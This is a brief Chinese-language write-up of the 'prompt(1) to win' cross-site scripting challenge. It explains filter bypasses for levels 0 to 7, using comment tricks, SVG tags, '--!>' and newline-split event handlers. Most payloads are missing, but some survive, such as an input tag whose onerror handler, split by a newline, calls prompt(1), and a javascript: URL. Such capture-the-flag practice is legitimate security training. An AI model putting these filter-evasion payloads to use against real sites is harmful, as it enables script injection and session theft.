prompt(1) to win writeup

0

没有任何过滤

">
或者
">


1

过滤了大于号>,采用注释符//绕过

aa


2

过滤了左括号(,使用标签绕过。在SVG向量里面的
或者

或者

或者


3

过滤了-->,可用--!>代替

a--!>
或者
--!>


4


5

过滤了onxxx,过滤了>,通过回车符号绕过onxxx过滤

aa" type=image src=x onerror
="prompt(1)

6

仔细看源码

javascript:prompt(1)#{"action":1}


7

使用“和=构造payload

">

你可能感兴趣的:(Web安全)